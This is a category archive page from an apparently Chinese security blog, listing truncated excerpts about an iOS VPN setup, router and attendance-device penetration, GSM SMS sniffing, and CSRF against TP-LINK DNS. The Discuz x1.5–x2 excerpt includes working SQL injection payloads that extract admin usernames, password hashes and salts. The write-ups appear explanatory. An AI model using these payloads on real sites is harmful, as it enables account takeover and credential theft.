Category Archives: 未分类

IOS按需自动连接VPN 保持长链接

随着个人信息保护意识的增强,大多数人为了确保在外部未知网络下的信息安全,会使用VPN这类信息管道,对信息安全有苛刻要求的用户会采用自建服务器的方式,使用系统VPN功能进行通信,对于iOS/Mac等系统来说,基础的功能不能满足高阶用户,下面我们会使用一种更加智能的方式来建立长连接VPN。 本文适用于IPsec连接方式 将解决问题: 1.iOS VPN 在切换Wi-Fi/流量时会自动断线 并且长时间连接状况下极其不稳定。……

近况。

细数博客有一年多没更新了,近两年来也在慢慢脱离互联网安全这个圈子转向程序开发及自己的项目建设。两年下来,很多做互联网安全的同路人也在逐渐走散。互联网安全、白帽、黑帽的灰色地带法律难以鉴别致使越来越多从业者失去信心,大公司、正规军是目前作为网络安全爱好者必须有的后盾,否则风险是无力承担的。基于以上情况及现实中很多朋友的实例教训,Wooyun的倒闭,我选择退出这个走在法律边缘,没有积极……

中控设备缺陷利用

只要能搞定指纹考勤机(其余类型考勤机也同样),在很大情况下能搞定一家公司的所有人员信息,下面我说一下在研究指纹设备时发现的认证缺陷问题。 这里在软件选型上我找到了规模比较大的中控生物旗下的考勤产品下载,其中有下载量比较大的ZKTime系列的免费版。 介绍里说明几乎支持所有类型的指纹考勤机,指纹门禁及所有同品牌类型的指纹产品类型,如果算连接网络的设备全中国估计会有6位数以上的设备终端。 ……

TP-LINK渗透Report

0x00 工具 一台笔记本电脑 TD-W8901D路由器(firmware 6.0.0) 虚拟机(WIN7)、Kali Linux(攻击机)、evilgrade(一个模块化的脚本框架,可实现伪造的升级、自带DNS和WEB服务模块,http://www.infobyte.com.ar/down/isr-evilgrade-Readme.txt) Metasploit。 PDF:TPLink 0x01 示例 互联网攻击示意图:   局域网攻击示意图 市场上有很多类型的路由器可用,但绝大部分从未升级固件,所以可对大多数家……

高大上的漏洞Discuz x1.5– x2版本 二次注射

a',`subject`=(/*!select*/ concat(username,'|',password,'|',salt) from pre_ucenter_members where uid=1 limit 0,1),comment=' 再给出一些语句。 ',`subject`=(/*!select*/ group_concat(uid,':') from pre_common_member where groupid=1),comment='//查看管理用户 ',`subject`=(/*!select*/ group_concat(uid,':') from pre_common_member where groupid=2),comment='//超级版主 ',`subject`=(/*!sele……

GSM Hackeing 之 SMS Sniffer 学习

0x00 前言 最近看到微博以及一些论坛谈论关于GSM Hacking的比较多,使用的是开源的程序 osmocombb 和摩托罗拉的手机 c118。我也凑凑热闹,找来相关资料进行学习,国内关于这方面的资料的确太少了,大都是一些编译 osmocombb 的资料,而没有更深入的学习资料,比如如何进行 GSM SMS 的 Sniffer,估计是在我大宋朝这个太敏感了吧。 不过最近在 http://www.hacklook.com/ 却有不少相关的资料可以参考学习,在……

CSRF劫持TP-LINK-DNS

0x00 背景 路由被CSRF攻击,修改DNS的话题最近一直比较活跃,但是国内貌似没有一个技术文章详细的分析此漏洞,漏洞成因比较简单,本篇来科普一下。 本篇讲得是一个利用CVE-2013-2645的漏洞,来修改TP-LINK的DNS案例,针对其他路由的攻击大同小异。   0x01 EXP分析 攻击者会在自己的网站或者已经受他控制的网站上加入一段javascript代码: document.write("<script type=\"text/javascript\" src=\……
贴入百度统计、CNZZ、51啦、量子统计代码等等